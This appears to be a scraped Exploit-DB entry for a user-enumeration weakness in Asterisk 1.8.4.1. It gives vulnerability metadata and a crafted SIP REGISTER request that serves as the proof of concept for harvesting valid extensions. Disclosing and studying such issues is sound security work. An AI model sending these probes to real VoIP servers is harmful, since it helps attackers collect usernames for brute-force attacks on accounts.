header-logo
Suggest Exploit
vendor:
Asterisk
by:
Not available
5.5
CVSS
MEDIUM
User Enumeration
200
CWE
Product Name: Asterisk
Affected Version From: 1.8.4.1
Affected Version To: 1.8.4.1
Patch Exists: NO
Related CWE: Not available
CPE: a:digium:asterisk:1.8.4.1
Metasploit:
Other Scripts:
Platforms Tested:
2011

User Enumeration Weakness in Asterisk

An attacker can exploit a weakness in Asterisk to harvest valid usernames, which can be used in brute-force attacks.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/48008/info

Asterisk is prone to a user-enumeration weakness.

An attacker may leverage this issue to harvest valid usernames, which may aid in brute-force attacks.

This issue affects Asterisk 1.8.4.1; other versions may also be affected. 


REGISTER sip:192.168.2.1 SIP/2.0
CSeq: 123 REGISTER
Via: SIP/2.0/UDP localhost:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport
User-Agent: TT
From: <sip:500@192.168.2.1>;tag=642d29cd-0671-e011-81a1-a1816009ca7a
Call-ID: 2e2f07e0499cec3abf7045ef3610f0f2
To: <sip:500@192.168.2.1>
Refer-To: sip:500@192.168.2.1
Contact: <sip:500@localhost>;q=1
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,SUBSCRIBE,NOTIFY,REFER,MESSAGE,INFO,PING
Expires: 3600
Content-Length: 28000
Max-Forwards: 70